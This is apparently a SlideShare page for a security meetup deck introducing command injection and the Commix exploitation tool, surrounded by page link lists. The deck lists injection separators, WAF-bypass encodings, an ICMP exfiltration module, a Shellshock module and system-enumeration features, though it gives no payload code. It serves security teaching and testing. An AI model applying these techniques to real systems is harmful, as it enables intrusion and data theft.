Uploaded bynullowaspmumbai
PPTX, PDF254 views

Commix

This document provides an overview of Commix, an open source tool for exploiting and testing for command injection vulnerabilities. It begins with an introduction to command injection attacks and why they occur. It then discusses the different types of command injection, including results-based and blind command injection techniques. The document outlines Commix's architecture, features, and modules. It concludes with recommendations for command injection testbeds and references for further information.

Embed presentation

Download to read offline
Commix The Command Injector
Who am I ? Working as an Application security Tester Contact me @rs.a0007@gmail.co
Agenda  Introduction to Command Injection  Why and where Command Injection may Occur?  Types of Command Injection  Detection techniques  Intro to Commix  Commix Architecture  Features and modules of commix  Demo
What is Command Injection ?  Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application  Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. The commands are executed with the privileges of vulnerable application
Where may command injections exist?  ADSL SOHO routers (i.e D-Link, TP-Link, Linksys, ....)  IP Cameras (i.e TP-Link, D-Link, Vivotek, Zero-IP, ...)  Network Printers (i.e Xerox, ...)  IP PBX Applications (i.e Asterisk PBX, FreePBX, ...)  Raspberry PI based Web Applications  Web Applications (i.e IBM, Sophos, Symantec, LanDesk, Cacti, SquirrelMail, ....)  Arduino based Web Applications
Why are command injections occur?  Command Injection attacks are OS-independent  Can Occur in Windows, Linux, Unix etc.  Also a programming language independent  May occur in applications written in various programming languages C,C++,C#, PHP, Java, Perl, Python, Ruby etc.  ..or web-based applications written in web app frameworks such as ASP.NET, Python Django, Ruby on Rails, CGI etc.
Types of Command Injection  Results-based Command Injection  The output of the injected command is visible on the vulnerable application  The attacker can directly infer if the command injection is succeeded or not  Blind Command Injection  The vulnerable application does not output the results of the injected command  The attacker cannot see the results of the injected commands on the screen
Blind Command Injection - Techniques There are two techniques to approach on Blind Command Injection  Time-based Command Injection  The results of the injected command can be noted by the “time delays”  File-based Command Injection tempfile based  The results of the injected command will be written to a file accessible on the vulnerable application
How to detect command injection ?  Use separators like ; : & | , . Techniques to bypass WAF or any filters  URL Encoding  Base64 Encoding  Wildcard obfuscation
About Commix  Commix is short for Command Injection Exploiter  It is designed by Anastasios Stasinopoulos  It Is aiming at facilitating web developers, penetration testers, security researchers to test and exploit command injection attacks on the web applications  it is very easy to find and exploit a command injection vulnerability on certain parameters or HTTP headers  Commix is written in python programming language  It requires python version 2.6.x or 2.7.x to install it
Supports  Supported Platforms  Linux  Mac OSX  Windows (experimental)  Available in below distros  ArchStrike  BlackArch Linux  BackBox  Kali Linux  Parrot Security OS  Weakerthan Linux
Architecture of Commix
Reduced False Positives  On results-based command injection  Prints the results in three lines as  Type of technique  Which technique  Payload  On blind-based command injection  Evaluates the average response time of server  Applies the average time as a time to test
Features of commix  It allows to provide our own HTTP Headers  It supports to test via all these headers  It supports enumeration options like  Current user  Current hostname  User has root privileges or not  System Information  System users list etc.
Modules  The “ICMP exfiltration“ module  This module is designed to provide a server-side component to receive and store files, exfiltrated over ICMP echo request packets  The 'Shellshock' module  This module is designed to affect a bash vulnerability which allows an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system.  Develop and easily import your own modules  Increase the capabilities of commix and/or adapt it to our needs
It’s Demo Time
Testbeds  Commix testbed - https://github.com/s4n7h0/xvwa  Pentester Academy command injection iso - https://www.vulnhub.com/entry/command-injection-iso-1,81/  bWAPP(bee-box) - https://www.vulnhub.com/entry/bwapp-bee- box-v16,53/  XVWA - https://github.com/s4n7h0/xvwa  DVWA - http://www.dvwa.co.uk/  OWASP Mutillidae - https://sourceforge.net/projects/mutillidae/
References  OWASP - https://www.owasp.org/index.php/Command_Injection  Commix- http://www.commixproject.com/  Usage examples - https://github.com/commixproject/commix/wiki/Usage- Examples
Any Questions?

More Related Content

PDF
WebブラウザでC#実行 WebAssemblyの技術
bySho Okada
 
KEY
やはりお前らのMVCは間違っている
byKoichi Tanaka
 
PPTX
SharePoint 開発入門
byHiroaki Oikawa
 
PDF
RestfulなAPIの設計のお話
byftsan
 
PDF
SQLインジェクション総”習”編
byYasuo Ohgaki
 
PDF
DLL読み込みの問題を読み解く
byJPCERT Coordination Center
 
PDF
GitHub Copilotとともに次の開発体験へ
byKazumi OHIRA
 
PPTX
凡人の凡人による凡人のためのデザインパターン第一幕 Public
bybonjin6770 Kurosawa
 
WebブラウザでC#実行 WebAssemblyの技術
bySho Okada
 
やはりお前らのMVCは間違っている
byKoichi Tanaka
 
SharePoint 開発入門
byHiroaki Oikawa
 
RestfulなAPIの設計のお話
byftsan
 
SQLインジェクション総”習”編
byYasuo Ohgaki
 
DLL読み込みの問題を読み解く
byJPCERT Coordination Center
 
GitHub Copilotとともに次の開発体験へ
byKazumi OHIRA
 
凡人の凡人による凡人のためのデザインパターン第一幕 Public
bybonjin6770 Kurosawa
 

What's hot

PDF
RESTfulとは
by星影 月夜
 
PDF
今日からできる!簡単 .NET 高速化 Tips
byTakaaki Suzuki
 
PPTX
Gocon2017:Goのロギング周りの考察
by貴仁 大和屋
 
PDF
今日こそ理解するHot / Cold @社内RxSwift勉強会
byYuki Takahashi
 
PDF
Docker Compose 徹底解説
byMasahito Zembutsu
 
PDF
オブジェクト指向できていますか?
byMoriharu Ohzu
 
PDF
Playgram開発秘話_2022年1月プログラミングシンポジウム招待講演_西澤勇輝、岡本雄太
byPreferred Networks
 
PPTX
世界一わかりやすいClean Architecture
byAtsushi Nakamura
 
PDF
C#でもメタプログラミングがしたい!!
byTATSUYA HAYAMIZU
 
PPTX
Neo4j の「データ操作プログラミング」から 「ビジュアライズ」まで
byKeiichiro Seida
 
PDF
C#の強み、或いは何故PHPから乗り換えるのか
byYoshifumi Kawai
 
PDF
게임서버 구축 방법비교 : GBaaS vs. Self-hosting
byiFunFactory Inc.
 
PDF
PHP の GC の話
byy-uti
 
PDF
SQLアンチパターン - 開発者を待ち受ける25の落とし穴 (拡大版)
byTakuto Wada
 
PPT
Di入門
byRyo Asai
 
PDF
がんばらなくても C# で Single Page Web アプリケーションが書けてしまう「Blazor」とは
byJun-ichi Sakamoto
 
PDF
JJUG CCC 2013 Fall「JVMコードリーディング入門-JVMのOS抽象化レイヤーについて-」
byy torazuka
 
PDF
ADRという考えを取り入れてみて
byinfinite_loop
 
PPTX
Rootlessコンテナ
byAkihiro Suda
 
PDF
Laravel で API バージョニングを実装するなら
byShohei Okada
 
RESTfulとは
by星影 月夜
 
今日からできる!簡単 .NET 高速化 Tips
byTakaaki Suzuki
 
Gocon2017:Goのロギング周りの考察
by貴仁 大和屋
 
今日こそ理解するHot / Cold @社内RxSwift勉強会
byYuki Takahashi
 
Docker Compose 徹底解説
byMasahito Zembutsu
 
オブジェクト指向できていますか?
byMoriharu Ohzu
 
Playgram開発秘話_2022年1月プログラミングシンポジウム招待講演_西澤勇輝、岡本雄太
byPreferred Networks
 
世界一わかりやすいClean Architecture
byAtsushi Nakamura
 
C#でもメタプログラミングがしたい!!
byTATSUYA HAYAMIZU
 
Neo4j の「データ操作プログラミング」から 「ビジュアライズ」まで
byKeiichiro Seida
 
C#の強み、或いは何故PHPから乗り換えるのか
byYoshifumi Kawai
 
게임서버 구축 방법비교 : GBaaS vs. Self-hosting
byiFunFactory Inc.
 
PHP の GC の話
byy-uti
 
SQLアンチパターン - 開発者を待ち受ける25の落とし穴 (拡大版)
byTakuto Wada
 
Di入門
byRyo Asai
 
がんばらなくても C# で Single Page Web アプリケーションが書けてしまう「Blazor」とは
byJun-ichi Sakamoto
 
JJUG CCC 2013 Fall「JVMコードリーディング入門-JVMのOS抽象化レイヤーについて-」
byy torazuka
 
ADRという考えを取り入れてみて
byinfinite_loop
 
Rootlessコンテナ
byAkihiro Suda
 
Laravel で API バージョニングを実装するなら
byShohei Okada
 

Similar to Commix

PDF
Commix Detecting And Exploiting.pdf
byssuser387cf0
 
PPTX
Os Command Injection Attack
byRaghav Bisht
 
PDF
command-injection-v3.pdf
byOkan YILDIZ
 
PPTX
Command injection
bypenetration Tester
 
PPTX
Command Injection - critical security vulnerability.pptx
bynanovates
 
PPTX
Command Injection - Ethical Hacking.pptx
bynanovates
 
PPTX
Secure Code Warrior - Os command injection
bySecure Code Warrior
 
PDF
Blindsql
bybig boss
 
PDF
Blindsql
byRitu Raj
 
PDF
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
byrgster
 
PPTX
Development-of-a-Vulnerability-Scanner-for-OS-Command-Injection-in-Web-Applic...
bychestamangla1
 
PDF
Automated defense from rootkit attacks
byUltraUploader
 
PPT
RSA 2005 H&T: Die Script Kiddie! Die, Die, Die!
byDan Houser
 
PDF
Modern malware and threats
byMartin Holovský
 
DOCX
Ceh certified ethical hacker
bybestip
 
PDF
SOHOpelessly Broken
byThe Security of Things Forum
 
PDF
Advanced-Penetration-TestinAPT With KALI Linux Course Content.pdf
byMansi Kandari
 
PDF
Advanced-Penetration-Testing_course_content
bypriyanshamadhwal2
 
PDF
Command injection komal_armarkar
byKomal Armarkar
 
PPT
Threats, Vulnerabilities & Security measures in Linux
byAmitesh Bharti
 
Commix Detecting And Exploiting.pdf
byssuser387cf0
 
Os Command Injection Attack
byRaghav Bisht
 
command-injection-v3.pdf
byOkan YILDIZ
 
Command injection
bypenetration Tester
 
Command Injection - critical security vulnerability.pptx
bynanovates
 
Command Injection - Ethical Hacking.pptx
bynanovates
 
Secure Code Warrior - Os command injection
bySecure Code Warrior
 
Blindsql
bybig boss
 
Blindsql
byRitu Raj
 
Black hat 2010-bannedit-advanced-command-injection-exploitation-1-wp
byrgster
 
Development-of-a-Vulnerability-Scanner-for-OS-Command-Injection-in-Web-Applic...
bychestamangla1
 
Automated defense from rootkit attacks
byUltraUploader
 
RSA 2005 H&T: Die Script Kiddie! Die, Die, Die!
byDan Houser
 
Modern malware and threats
byMartin Holovský
 
Ceh certified ethical hacker
bybestip
 
SOHOpelessly Broken
byThe Security of Things Forum
 
Advanced-Penetration-TestinAPT With KALI Linux Course Content.pdf
byMansi Kandari
 
Advanced-Penetration-Testing_course_content
bypriyanshamadhwal2
 
Command injection komal_armarkar
byKomal Armarkar
 
Threats, Vulnerabilities & Security measures in Linux
byAmitesh Bharti
 

More from nullowaspmumbai

PPTX
Xxe
bynullowaspmumbai
 
PDF
ELK in Security Analytics
bynullowaspmumbai
 
PPTX
Switch security
bynullowaspmumbai
 
PPTX
Radio hacking - Part 1
bynullowaspmumbai
 
PPTX
How I got my First CVE
bynullowaspmumbai
 
PPTX
Power forensics
bynullowaspmumbai
 
PPTX
Infrastructure security & Incident Management
bynullowaspmumbai
 
PPTX
Middleware hacking
bynullowaspmumbai
 
PPTX
Internet censorship circumvention techniques
bynullowaspmumbai
 
PPTX
How i got my first cve
bynullowaspmumbai
 
PPTX
Adversarial machine learning updated
bynullowaspmumbai
 
PPTX
Adversarial machine learning
bynullowaspmumbai
 
PPTX
Dll Hijacking
bynullowaspmumbai
 
PPTX
Abusing Target
bynullowaspmumbai
 
PDF
NTFS Forensics
bynullowaspmumbai
 
PPTX
Drozer - An Android Application Security Tool
bynullowaspmumbai
 
PPTX
Middleware hacking
bynullowaspmumbai
 
PDF
Ganesh naik linux_kernel_internals
bynullowaspmumbai
 
PDF
Buffer overflow null
bynullowaspmumbai
 
PDF
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
bynullowaspmumbai
 
Xxe
bynullowaspmumbai
 
ELK in Security Analytics
bynullowaspmumbai
 
Switch security
bynullowaspmumbai
 
Radio hacking - Part 1
bynullowaspmumbai
 
How I got my First CVE
bynullowaspmumbai
 
Power forensics
bynullowaspmumbai
 
Infrastructure security & Incident Management
bynullowaspmumbai
 
Middleware hacking
bynullowaspmumbai
 
Internet censorship circumvention techniques
bynullowaspmumbai
 
How i got my first cve
bynullowaspmumbai
 
Adversarial machine learning updated
bynullowaspmumbai
 
Adversarial machine learning
bynullowaspmumbai
 
Dll Hijacking
bynullowaspmumbai
 
Abusing Target
bynullowaspmumbai
 
NTFS Forensics
bynullowaspmumbai
 
Drozer - An Android Application Security Tool
bynullowaspmumbai
 
Middleware hacking
bynullowaspmumbai
 
Ganesh naik linux_kernel_internals
bynullowaspmumbai
 
Buffer overflow null
bynullowaspmumbai
 
Null Mumbai Meet_Android Reverse Engineering by Samrat Das
bynullowaspmumbai
 

Recently uploaded

PPTX
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
PPTX
Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering
bySemantic SEO BD
 
PPTX
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
PPTX
TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony
bysuhasspgdg
 
PPTX
apidays Paris 2025 | Integration is Feminist: Building Peace in Distributed S...
byapidays
 
PDF
Startup Formation Collapses While Acquisition Activity Hits New High!
byMemoori
 
PDF
Advanced SELinux Management - RHCSA (RH134).pdf
byLinuxCert Guru
 
PDF
UiPath Automation Developer Associate Training Series 2026 - Session 1
byDianaGray10
 
PDF
TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...
byapidays
 
PPTX
How Does an ICO Launchpad Work Step-by-Step Breakdown.pptx
byTom Hardy S
 
PDF
Mount File Systems using UUID and Label - RHCSA (RH134).pdf
byLinuxCert Guru
 
PDF
Analyze and Preserve Logs - RHCSA (RH134).pdf
byLinuxCert Guru
 
PPTX
Introduction to Artificial Intelligence (AI).pptx
byammar414783
 
PDF
The Manifesto for AI-enabled Governance !
byYannis Charalabidis
 
PDF
AI for Risk Management & Fraud Detection ppt.pdf
byalexmartincaneda
 
PDF
Track Phone Location by Number (2026)_ What’s Actually Possible for Free (and...
byEmily Woods
 
PDF
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
PDF
GenerationAI Paris 2025 | How Agentic AI is Reinventing Organizations
byapidays
 
PDF
Mesh WiFi Router: The Smart Solution for Fast, Seamless, Whole-Home Internet
byAeroMesh Systems
 
PDF
AI and Zero Trust: What it takes to do it right
byMark Simos
 
Automation Without Apprentices: How AI Challenges the Open Source Way
byIcinga
 
Retrieval Augmented Generation- The Synergistic Power of Prompt Engineering
bySemantic SEO BD
 
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
TechSprint (SJBIT) 2025-26 Hackathon Winners & Awards Ceremony
bysuhasspgdg
 
apidays Paris 2025 | Integration is Feminist: Building Peace in Distributed S...
byapidays
 
Startup Formation Collapses While Acquisition Activity Hits New High!
byMemoori
 
Advanced SELinux Management - RHCSA (RH134).pdf
byLinuxCert Guru
 
UiPath Automation Developer Associate Training Series 2026 - Session 1
byDianaGray10
 
TravelTech Paris 2025 | The EU Digital Identity Wallet and it’s impact on Tra...
byapidays
 
How Does an ICO Launchpad Work Step-by-Step Breakdown.pptx
byTom Hardy S
 
Mount File Systems using UUID and Label - RHCSA (RH134).pdf
byLinuxCert Guru
 
Analyze and Preserve Logs - RHCSA (RH134).pdf
byLinuxCert Guru
 
Introduction to Artificial Intelligence (AI).pptx
byammar414783
 
The Manifesto for AI-enabled Governance !
byYannis Charalabidis
 
AI for Risk Management & Fraud Detection ppt.pdf
byalexmartincaneda
 
Track Phone Location by Number (2026)_ What’s Actually Possible for Free (and...
byEmily Woods
 
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
GenerationAI Paris 2025 | How Agentic AI is Reinventing Organizations
byapidays
 
Mesh WiFi Router: The Smart Solution for Fast, Seamless, Whole-Home Internet
byAeroMesh Systems
 
AI and Zero Trust: What it takes to do it right
byMark Simos
 

Commix

  • 1.
  • 2.
    Who am I? Working as an Application security Tester Contact me @rs.a0007@gmail.co
  • 3.
    Agenda  Introduction toCommand Injection  Why and where Command Injection may Occur?  Types of Command Injection  Detection techniques  Intro to Commix  Commix Architecture  Features and modules of commix  Demo
  • 4.
    What is CommandInjection ?  Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application  Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. The commands are executed with the privileges of vulnerable application
  • 5.
    Where may commandinjections exist?  ADSL SOHO routers (i.e D-Link, TP-Link, Linksys, ....)  IP Cameras (i.e TP-Link, D-Link, Vivotek, Zero-IP, ...)  Network Printers (i.e Xerox, ...)  IP PBX Applications (i.e Asterisk PBX, FreePBX, ...)  Raspberry PI based Web Applications  Web Applications (i.e IBM, Sophos, Symantec, LanDesk, Cacti, SquirrelMail, ....)  Arduino based Web Applications
  • 6.
    Why are commandinjections occur?  Command Injection attacks are OS-independent  Can Occur in Windows, Linux, Unix etc.  Also a programming language independent  May occur in applications written in various programming languages C,C++,C#, PHP, Java, Perl, Python, Ruby etc.  ..or web-based applications written in web app frameworks such as ASP.NET, Python Django, Ruby on Rails, CGI etc.
  • 7.
    Types of CommandInjection  Results-based Command Injection  The output of the injected command is visible on the vulnerable application  The attacker can directly infer if the command injection is succeeded or not  Blind Command Injection  The vulnerable application does not output the results of the injected command  The attacker cannot see the results of the injected commands on the screen
  • 8.
    Blind Command Injection- Techniques There are two techniques to approach on Blind Command Injection  Time-based Command Injection  The results of the injected command can be noted by the “time delays”  File-based Command Injection tempfile based  The results of the injected command will be written to a file accessible on the vulnerable application
  • 9.
    How to detectcommand injection ?  Use separators like ; : & | , . Techniques to bypass WAF or any filters  URL Encoding  Base64 Encoding  Wildcard obfuscation
  • 10.
    About Commix  Commixis short for Command Injection Exploiter  It is designed by Anastasios Stasinopoulos  It Is aiming at facilitating web developers, penetration testers, security researchers to test and exploit command injection attacks on the web applications  it is very easy to find and exploit a command injection vulnerability on certain parameters or HTTP headers  Commix is written in python programming language  It requires python version 2.6.x or 2.7.x to install it
  • 11.
    Supports  Supported Platforms Linux  Mac OSX  Windows (experimental)  Available in below distros  ArchStrike  BlackArch Linux  BackBox  Kali Linux  Parrot Security OS  Weakerthan Linux
  • 12.
  • 14.
    Reduced False Positives On results-based command injection  Prints the results in three lines as  Type of technique  Which technique  Payload  On blind-based command injection  Evaluates the average response time of server  Applies the average time as a time to test
  • 15.
    Features of commix It allows to provide our own HTTP Headers  It supports to test via all these headers  It supports enumeration options like  Current user  Current hostname  User has root privileges or not  System Information  System users list etc.
  • 16.
    Modules  The “ICMPexfiltration“ module  This module is designed to provide a server-side component to receive and store files, exfiltrated over ICMP echo request packets  The 'Shellshock' module  This module is designed to affect a bash vulnerability which allows an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system.  Develop and easily import your own modules  Increase the capabilities of commix and/or adapt it to our needs
  • 17.
  • 18.
    Testbeds  Commix testbed- https://github.com/s4n7h0/xvwa  Pentester Academy command injection iso - https://www.vulnhub.com/entry/command-injection-iso-1,81/  bWAPP(bee-box) - https://www.vulnhub.com/entry/bwapp-bee- box-v16,53/  XVWA - https://github.com/s4n7h0/xvwa  DVWA - http://www.dvwa.co.uk/  OWASP Mutillidae - https://sourceforge.net/projects/mutillidae/
  • 19.
    References  OWASP - https://www.owasp.org/index.php/Command_Injection Commix- http://www.commixproject.com/  Usage examples - https://github.com/commixproject/commix/wiki/Usage- Examples
  • 20.